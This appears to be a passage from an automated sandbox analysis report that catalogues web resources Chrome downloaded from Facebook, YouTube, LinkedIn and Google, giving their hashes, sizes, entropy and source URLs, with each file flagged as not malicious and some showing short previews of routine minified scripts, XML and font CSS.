                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometSetDenseModeMutation_facebookRelayOperation",[],(function(a,b,c,d,e,f){e.exports="4486145264820781"}),null);.__d("CometSetDenseModeMutation.graphql",["CometSetDenseModeMutation_facebookRelayOperation"],(function(a,b,c,d,e,f){"use strict";a=function(){var a=[{defaultValue:null,kind:"LocalArgument",name:"input"}],c=[{alias:null,args:[{kind:"Variable",name:"input",variableName:"input"}],concreteType:"SetDenseModeResponsePayload",kind:"LinkedField",name:"set_dense_mode",plural:!1,selections:[{alias:null,args:null,concreteType:"Viewer",kind:"LinkedField",name:"viewer",plural:!1,selections:[{alias:null,args:null,kind:"ScalarField",name:"dense_mode_setting",storageKey:null}],storageKey:null}],storageKey:null}];return{fragment:{argumentDefinitions:a,kind:"Fragment",metadata:null,name:"CometSetDenseModeMutation",selections:c,type:"Mutation",abstractKey:null},kind:"Request",operation:{argumentDefinitions:a,kind:"Operation",name:"CometSetDenseModeMutation",selections:
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (3537)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):52603
                                                                                                                                                                                  Entropy (8bit):5.316331138717284
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:yYrF+dXpn0e+99D7FPUzHhbtjFnmFRbdwWRI32nB7PXAlnuhPisfq3ECoe5EzpGS:yYrF+d5n0e+99DJPUzHhbtjFnmFRbdwM
                                                                                                                                                                                  MD5:F0A9F2F65F95B61810777606051EE17D
                                                                                                                                                                                  SHA1:872BF131CB4BEFD0242339F072F2F9B9FBF8019F
                                                                                                                                                                                  SHA-256:9CDF2602AC04F7E2BED582D4299C73D464FC4AB069E3AD5A20EE2B6635A015B8
                                                                                                                                                                                  SHA-512:6823914507BA31E0F61B95CC53F09543C3C14E5530E9EF1B00338FBBD7C25D2E398F5F628DF4ED25D6FF88E0F8BEE506EFE62BA704778BA7CFF09AEC9579D9F0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.gstatic.com/eureka/clank/117/cast_sender.js
                                                                                                                                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var f,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},h="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},ca=ba(this),da=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&h(c,a,{configurable:!0,writable:!0,value:b})}};.da("Symbol",function(a){if(a)return a;var b=function(g,k){this.g=g;h(this,"description",{configurable:!0,writable:!0,value:k})};b.prototype.toStri
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (540), with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):540
                                                                                                                                                                                  Entropy (8bit):5.0953958403229755
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:TMHd2yqNZNNUrS7n4nuL0EGuSl6FGYdB2GSuh43JPYa0:2d2PNdUrS7nfcuSQ8YdqXya0
                                                                                                                                                                                  MD5:AABAC4B67E56DCAAA0C06DCEA2C8C7EC
                                                                                                                                                                                  SHA1:4AEC6ABB0BCB8B6828F0CFE62637D3B270FDEA6C
                                                                                                                                                                                  SHA-256:96D0C3380F81C5C429B2FAB04F6A9961F83287D1922A1B44A1DBD4A4004D62B6
                                                                                                                                                                                  SHA-512:C9709D6C0A2EE21148E5D8826A3093E3A353B7D2BA0C135924EA8079982A8475F71B5926AFE6F21FF67C2538574D2F6EC0C20C97ED836F6A67799EA05D20AC6D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/opensearch?locale=en_US
                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8"?><OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/"><ShortName>YouTube</ShortName><Description>Search for videos on YouTube</Description><Tags>youtube video</Tags><Image height="16" width="16" type="image/vnd.microsoft.icon">https://www.youtube.com/favicon.ico</Image><Url type="text/html" template="https://www.youtube.com/results?search_query={searchTerms}&amp;page={startPage?}&amp;utm_source=opensearch"></Url><Query role="example" searchTerms="cat"></Query></OpenSearchDescription>
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (612)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):5996
                                                                                                                                                                                  Entropy (8bit):5.333832123538773
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:3b+xu6Xvi9MjDJH4b00/Ehufm1sZSurumwgk2CzuIHYfVEAxzjtMK9NATIub:32fKzdugSLLF+tRQ
                                                                                                                                                                                  MD5:EC72A757ABBA28CB1DDDCDE8928BF192
                                                                                                                                                                                  SHA1:D2C8B9B60BBCF074386A139075E5D087FF07CCCB
                                                                                                                                                                                  SHA-256:C8F987C5B2238BBDCE06D97560CCC5E9069EE4766DF9C95C084708BD002E6999
                                                                                                                                                                                  SHA-512:2A7BC3B9817DAFEF2F2127AD13FEFCEDBFB4697D21B5089C74E481DC63342DB73C69054A033F9D98F6374D9BF976E65F4AB799FC8E6C134C7B85AAEC3D098262
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/s/player/5683fc5e/player_ias.vflset/en_US/miniplayer.js
                                                                                                                                                                                  Preview:(function(g){var window=this;'use strict';var Zsb=function(a,b){g.V.call(this,{I:"button",La:["ytp-miniplayer-expand-watch-page-button","ytp-button","ytp-miniplayer-button-top-left"],Y:{title:"{{title}}","data-tooltip-target-id":"ytp-miniplayer-expand-watch-page-button","aria-keyshortcuts":"i","data-title-no-tooltip":"{{data-title-no-tooltip}}"},V:[{I:"svg",Y:{height:"24px",version:"1.1",viewBox:"0 0 24 24",width:"24px"},V:[{I:"g",Y:{fill:"none","fill-rule":"evenodd",stroke:"none","stroke-width":"1"},V:[{I:"g",Y:{transform:"translate(12.000000, 12.000000) scale(-1, 1) translate(-12.000000, -12.000000) "},.V:[{I:"path",Y:{d:"M19,19 L5,19 L5,5 L12,5 L12,3 L5,3 C3.89,3 3,3.9 3,5 L3,19 C3,20.1 3.89,21 5,21 L19,21 C20.1,21 21,20.1 21,19 L21,12 L19,12 L19,19 Z M14,3 L14,5 L17.59,5 L7.76,14.83 L9.17,16.24 L19,6.41 L19,10 L21,10 L21,3 L14,3 Z",fill:"#fff","fill-rule":"nonzero"}}]}]}]}]});this.J=a;this.Ta("click",this.onClick,this);this.updateValue("title",g.rU(a,"Expand","i"));this.update({"da
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, baseline, precision 8, 480x854, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):49043
                                                                                                                                                                                  Entropy (8bit):7.97565661137414
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:57qH6ZYBCbXFbg45E8XUzDrqVj9hFkO+gCzdvZXcmExOD2Jd0haJXC0iCUbnIKwY:sHIYBCbXRHhkXrQhFX+gCRxXtPHXCIMu
                                                                                                                                                                                  MD5:642ED1A655122CDAB6773B41C26D79AB
                                                                                                                                                                                  SHA1:01DFE9828B29F0FC6190D83C5BC6C443FFCE2469
                                                                                                                                                                                  SHA-256:6B7FBAE5217801CD79AB9D76390AFF44A0E9092F58A94D8D9AA0D5BED53E675D
                                                                                                                                                                                  SHA-512:23BB2EB212336AD4BD5F66840764B99360CF483D6ACAA589FB4974B1D83457FA52C48B98444AED54BF424E8C5F07B921BD0833DCA2DD7610E8834439DEE24B62
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t15.5256-10/426792316_1137033600634981_4419544775212663723_n.jpg?_nc_cat=1&ccb=1-7&_nc_sid=1a7029&_nc_ohc=r-ESUcfvbL0AX-OEa4W&_nc_ht=scontent-lga3-2.xx&oh=00_AfA_yU8agZZsoJ2f93OneNcYWJgMem6aKMFcYFO5x3nzCg&oe=65DB4FC7
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 192 x 192, 8-bit colormap, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):2106
                                                                                                                                                                                  Entropy (8bit):7.554456957317547
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:EWP8JUaPVKWwCtcHB3sXXRBJ3v8qkZ/aWr/3KZerMLvSOxJ3Df8sfqV1:lkJVKWw03XXZ4Meo931fq
                                                                                                                                                                                  MD5:6452ED75C53E1A8E90A664DF18959A90
                                                                                                                                                                                  SHA1:AC01FC2F40F0E4808E22A9C569F3775F0F15A5E2
                                                                                                                                                                                  SHA-256:C7BAC3E7016DFC7EB5787579BAC6B975B433FC1A9C279DAFC35649D4782F2061
                                                                                                                                                                                  SHA-512:4B23F7FB31826943CBA6496BD74DC620C8EC3B8F0525497E825F1F1F87486335D4374F85417458C3C3E018C2215B9B419D7DE77CB67AAE9EA619038432E1EB10
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/y0/r/eFZD1KABzRA.png
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (41541)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):74197
                                                                                                                                                                                  Entropy (8bit):5.4551136708766705
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:1pbgXdxJkYuOm3Q+gXHcJXEal5yl/kPHTO677Y8PouA/sqk92474oIhfc0fnraJp:veHchBCdo25qMKcuktHzX+6UevL8F
                                                                                                                                                                                  MD5:1A385461F30E3F360D31F242FD6B3D98
                                                                                                                                                                                  SHA1:0C0D69D3D866E93732265776AE44FD02DB855D99
                                                                                                                                                                                  SHA-256:F89934AC0709430477B8A664F72035461A08E79AAB91944D71D695660D810C13
                                                                                                                                                                                  SHA-512:8F5957C1FB9DA9BC831E688F66F4DE1362ED2A2B7A557F9607C7DD93F99D7E07A339B52C350CE1CC236EC5A2B84AE9CE7FF53F12319C967CC4A3D6C5DDCFF161
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.licdn.com/sc/h/1jvrml64dlmt60uoawzo2af88
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (511)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):2051
                                                                                                                                                                                  Entropy (8bit):5.245569770149611
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:x2npr4QxmTJsIxHPTNSxf0gzu590yKECxex3XZKE+:x44wmTJsYH7NGf0gKT0yKE2K3pJ+
                                                                                                                                                                                  MD5:A94E7CD86F5824E27720F5D3C712DF9A
                                                                                                                                                                                  SHA1:7BF52949685727D7133F452B432A57615E40978F
                                                                                                                                                                                  SHA-256:59CE6BDF8E3D17BB68667499C34A3EC32B9F7836DBCA59D03237A4C9FFFEFD35
                                                                                                                                                                                  SHA-512:726D7BB3C7D356453A10D590EE4806BDE864FC7E909BA8F03E194B1F1BAA0D65AE8FC89E9E393F2300ED3536969E7445AC39860E3BB0EA338EF19F4B51139B9F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/s/desktop/87423d78/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (2164), with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):2164
                                                                                                                                                                                  Entropy (8bit):5.007692541572839
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:/CpDuMY6wRQAQl07kBeFxDKNpK9xvj+Zy3t:/snIQAFhRl
                                                                                                                                                                                  MD5:68225657C41B94DFDD7669563FA18C80
                                                                                                                                                                                  SHA1:58E43494BC31122F06FCB3AA3764BE2883D0618F
                                                                                                                                                                                  SHA-256:72BCCD36C17AA93A7BB553557626BB720BE60CDE2357D817BD03AF6BE67CF08E
                                                                                                                                                                                  SHA-512:18441A68B88395A98A1721CE772AA98D0A05AC080E4C7C2A8A0598F46837FCFF8A1C5978E6A0C3146A088CCA632ED43B377FF63DB15195976AE958D35E9FB1CB
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.licdn.com/sc/h/65xtw2y5evpkuq3vtf8wiydts
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (405)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1600
                                                                                                                                                                                  Entropy (8bit):5.234459115233662
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:kMYD7i1NPxJ3nktBNuryNPxyhzs/fdkTRxuAoMylW6MumIcu2yNPxxQ34OZI86y2:o7iHY0rs9ORxvoMylxr2sQJ7DNzfrw
                                                                                                                                                                                  MD5:967DFEEC6A7FD39DC7FE665E776702E2
                                                                                                                                                                                  SHA1:AA15F9DF789871C3AFAC0D31962E1E71F1D9CD58
                                                                                                                                                                                  SHA-256:D432D0BB701BE738D8E070DBFAEE681AB412F157E5ADBC63099309FC2DFF6252
                                                                                                                                                                                  SHA-512:461D5EE5A265CD8DEFD3EB0C286DAA5DAC8C115621CA9420694DA308093C0DA6280B3366B3C1ED5B4BF106CB2BC9AAB827E63B36D4E71447153581ADB18298AA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.QKwFb1UtQb4.es5.O/ck=boq-identity.AccountsSignInUi.NrxHlLi3bwM.L.B1.O/am=P2CJhmMBEJhZTvP3jJPDAAAAAAAAAAAAawA7/d=1/exm=AvtSve,Ctsu,EFQ78c,EGw7Od,EN3i8d,I6YDgd,IZ1fbc,IZT63,K0PMbc,KUM7Z,L1AAkb,LDQI,LEikZe,MpJwZc,NOeYWe,O6y8ed,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,Rusgnf,SCuOPb,STuCOe,SpsfSb,UPKV3d,UUJqVe,Uas9Hd,W2YXuc,YHI3We,YTxL4,ZUKRxc,ZwDk9d,_b,_tp,aW3pY,b3kMqb,bPkrc,bSspM,bTi8wc,bm51tf,byfTOb,eVCnO,fFzhe,fJpY1b,fqEYIb,hc6Ubd,hmHrle,inNHtf,kSPLL,lsjVmc,ltDFwf,lwddkf,mWLH9d,my67ye,n73qwf,njlZCf,oLggrd,pxq3x,qPfo0c,qmdT9,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,ws9Tlc,xBaz7b,xQtZb,yRXbo,ywOR5c,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlG2bCygi1DFAdwYKgmmvgAMIJrIdw/ee=ASJRFf:LANRae;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:BDnJmb;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:fqEYIb;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=w9hDv,VwDzFe,A7fCU"
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (36945)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):140181
                                                                                                                                                                                  Entropy (8bit):5.409251244220194
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:erEarAE8EkFanSN/mFOB/mltKmLdEIwQGNGra3mRuh/sFhFHNreDog0akXkQhWt+:eW0xPENJ3mRu/sj9NrTZakWt6eA2+H
                                                                                                                                                                                  MD5:9B573BCB718A31275EC0B4311CE4A433
                                                                                                                                                                                  SHA1:28550F57CF577ED9068488EC42536C433B1992FB
                                                                                                                                                                                  SHA-256:BCE5FAC70A3C1EE99224DA729B39386CEF6DB6025B5533F73BEB049D7BB8B193
                                                                                                                                                                                  SHA-512:E3958DE26BA3B279EC2E3BBFF880A64AF89BCDD55CEE074161B13ECA6508B207FDC347AA1995AD03BD954D0C793281B1E389259AA262986E1AE0CFA0EB345BB5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://platform.linkedin.com/litms/utag/checkpoint-frontend/utag.js?cb=1708515000000
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (7900)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):8225
                                                                                                                                                                                  Entropy (8bit):4.911607900844373
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:z2RGUcHwbEnZH01FHqEOYjbuCUY3bkQsS6SxSrxLFvH7WJdJw:WGUcHEFHqEOYjbuCp3bkQspksxLAJdJw
                                                                                                                                                                                  MD5:21FC7CBFE59EF536848322B68193FB2B
                                                                                                                                                                                  SHA1:FA5799DA1DCF8D45DC450412C97D1D6B83853DC0
                                                                                                                                                                                  SHA-256:FAF51C91A2F951D04BC693815FC35844F321BDEB5093F866DEB591BD4B9CF31F
                                                                                                                                                                                  SHA-512:24807F2D1B0E7A4E0B2C8A4B900CF6B044ECFDD3D379911E5E104BAC4390F7EA57653220883786EC424DAAA6751D9DC122D106371663DDB49F6910363EF9BFD6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/sw.js
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 49 x 74, 8-bit colormap, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1633
                                                                                                                                                                                  Entropy (8bit):7.352151724937379
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:Qy3Hwa/3ffWoAf6t+snxsGhlYUcGwMMQ1:xQaXfKG+IJcJM51
                                                                                                                                                                                  MD5:72EE577BCC1A6A29D0422C3EB1248861
                                                                                                                                                                                  SHA1:800818D8D4A3E67D49ED2A3A935B355F8452DDDD
                                                                                                                                                                                  SHA-256:97FADFDD7D274DAABD9F7D79C817F4A9FACC08EBA67E38284698525E8A1FFFD0
                                                                                                                                                                                  SHA-512:A373DB5E786A91D299394B45D707A067CEC708966B8757BF84F5BEF0F167E7EE4388C4356468526A6A8B4AD3521773FE78FDE18422B16F730D9116245544171B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/7NqDjYL3eb9.png
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (936)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):5863
                                                                                                                                                                                  Entropy (8bit):5.542506058381083
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:ercpdAw1xFVObY2GhlzSSt0531195315WnGIjkC4EBBIjKuKSwXr6:ekdAMFVObY2GjDm19D5WnGIj8OByKD6
                                                                                                                                                                                  MD5:F3356B556175318CF67AB48F11F2421B
                                                                                                                                                                                  SHA1:ACE644324F1CE43E3968401ECF7F6C02CE78F8B7
                                                                                                                                                                                  SHA-256:263C24AC72CB26AB60B4B2911DA2B45FEF9B1FE69BBB7DF59191BB4C1E9969CD
                                                                                                                                                                                  SHA-512:A2E5B90B1944A9D8096AE767D73DB0EC5F12691CF1AEBD870AD8E55902CEB81B27A3C099D924C17D3D51F7DBC4C3DD71D1B63EB9D3048E37F71B2F323681B0AD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/s/desktop/87423d78/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.js
                                                                                                                                                                                  Preview:(function(){'use strict';/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var e=this||self;function f(c,b){c=c.split(".");var a=e;c[0]in a||"undefined"==typeof a.execScript||a.execScript("var "+c[0]);for(var d;c.length&&(d=c.shift());)c.length||void 0===b?a[d]&&a[d]!==Object.prototype[d]?a=a[d]:a=a[d]={}:a[d]=b}.;var g={YEAR_FULL:"y",YEAR_FULL_WITH_ERA:"y G",YEAR_MONTH_ABBR:"MMM y",YEAR_MONTH_FULL:"MMMM y",YEAR_MONTH_SHORT:"MM/y",MONTH_DAY_ABBR:"MMM d",MONTH_DAY_FULL:"MMMM dd",MONTH_DAY_SHORT:"M/d",MONTH_DAY_MEDIUM:"MMMM d",MONTH_DAY_YEAR_MEDIUM:"MMM d, y",WEEKDAY_MONTH_DAY_MEDIUM:"EEE, MMM d",WEEKDAY_MONTH_DAY_YEAR_MEDIUM:"EEE, MMM d, y",DAY_ABBR:"d",MONTH_DAY_TIME_ZONE_SHORT:"MMM d, h:mm\u202fa zzzz"},h=g;h=g;var k={ERAS:["BC","AD"],ERANAMES:["Before Christ","Anno Domini"],NARROWMONTHS:"JFMAMJJASOND".split(""),STANDALONENARROWMONTHS:"JFMAMJJASOND".split(""),MONTHS:"January February March April May June July August September October November December
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1116)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):74033
                                                                                                                                                                                  Entropy (8bit):5.496125678356682
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:4GIr9iykWXc8VV4ucbxiyXdpGupDMbSrOLR0QZWtPWDG4nFjI9rkiDyVO9HI4Ckn:h45nb3nxQIiENg5Bi+C02by5
                                                                                                                                                                                  MD5:1D50E206021F1BBACF8EC3080B04264A
                                                                                                                                                                                  SHA1:5024B3A6930C7F8D47DE1472B38BA590A657F882
                                                                                                                                                                                  SHA-256:9EE512AE80E59BE486F738680AA45ED4E31E7458A0B48F40128637B772224261
                                                                                                                                                                                  SHA-512:5E065ED27D57432099060906B79C5B4849236CEE091C7FEDD8D57FC5732E5746AC5E5366497C4F31AE7A79D52EDF82104463A8E042D411820B219940BF2A9684
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700&family=YouTube+Sans:wght@300..900&display=swap
                                                                                                                                                                                  Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCRc4EsA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fABc4EsA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCBc4EsA.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. f
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (10908)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):487106
                                                                                                                                                                                  Entropy (8bit):5.574039066471677
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:05r0PfcrnFasY0aSIEWGPcGCmvH29uwgpxz6lSff9XDMl2W/fel7Ow/qTBPci26o:0Av5hMwgpXlW/f+yTZciIUCUz8QPui7k
                                                                                                                                                                                  MD5:BBA2A3EC7F7DA56BD8E9AA9D9D0FACAA
                                                                                                                                                                                  SHA1:6E317D93695A15A94B47045B960D83D3E774F0B6
                                                                                                                                                                                  SHA-256:635C4E96C6CCC7A86E33B86F2C387EFB5F8ED0065CA2846CAAAF8C59A5BA4DE2
                                                                                                                                                                                  SHA-512:4F268927A1FDC12BE199A341F99609F1A747C6A0F0CF403A7EB7A8A5BD3FC62D22BD9BB9EF012B07EB73E6988F1ED289F7E8E06490FCB413663A1738CF32DB42
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iiqW4/yp/l/en_US/a9CIW7r0LUeYFZAZTRXrqCrVCiehpPxO1r5U3aG_1V6P1w2TF_zjTjnW4FbVE7VLZhah1m-QatNLCvPbvFcpHZo5jFgIVR4NSd8Jv0Nuruwv9a1i_pdlivXmwa2O3nvkFqAE01U975kCvVo5VdgSV-eRKaWgG9iZI3TVF3bINdSIhPHL0dpVCRBCDkRIDOWfZomugVzXJNekCZ6S34zcHhszLr0G.js?_nc_x=Ij3Wp8lg5Kz
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometFeedStoryMenuQuery_facebookRelayOperation",[],(function(a,b,c,d,e,f){e.exports="7083058335113269"}),null);.__d("CometFeedStoryMenuQuery$Parameters",["CometFeedStoryMenuQuery_facebookRelayOperation"],(function(a,b,c,d,e,f){"use strict";a={kind:"PreloadableConcreteRequest",params:{id:b("CometFeedStoryMenuQuery_facebookRelayOperation"),metadata:{},name:"CometFeedStoryMenuQuery",operationKind:"query",text:null}};e.exports=a}),null);.__d("CometFeedStoryMenuSection_promotion.graphql",[],(function(a,b,c,d,e,f){"use strict";a={argumentDefinitions:[],kind:"Fragment",metadata:null,name:"CometFeedStoryMenuSection_promotion",selections:[{alias:null,args:null,concreteType:"QuickPromotion",kind:"LinkedField",name:"local_alerts_story_menu_promotion",plural:!1,selections:[{args:null,kind:"FragmentSpread",name:"useCometTooltipQP_quickPromotion"}],storageKey:null}],type:"CometFeedStoryDefaultContextLayoutStrategy",abstractKey:null};e.exports=a}),null);.__d("useCometTooltipQP
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (405)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1600
                                                                                                                                                                                  Entropy (8bit):5.234459115233662
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:kMYD7i1NPxJ3nktBNuryNPxyhzs/fdkTRxuAoMylW6MumIcu2yNPxxQ34OZI86y2:o7iHY0rs9ORxvoMylxr2sQJ7DNzfrw
                                                                                                                                                                                  MD5:967DFEEC6A7FD39DC7FE665E776702E2
                                                                                                                                                                                  SHA1:AA15F9DF789871C3AFAC0D31962E1E71F1D9CD58
                                                                                                                                                                                  SHA-256:D432D0BB701BE738D8E070DBFAEE681AB412F157E5ADBC63099309FC2DFF6252
                                                                                                                                                                                  SHA-512:461D5EE5A265CD8DEFD3EB0C286DAA5DAC8C115621CA9420694DA308093C0DA6280B3366B3C1ED5B4BF106CB2BC9AAB827E63B36D4E71447153581ADB18298AA
                                                                                                                                                                                  Malicious:false
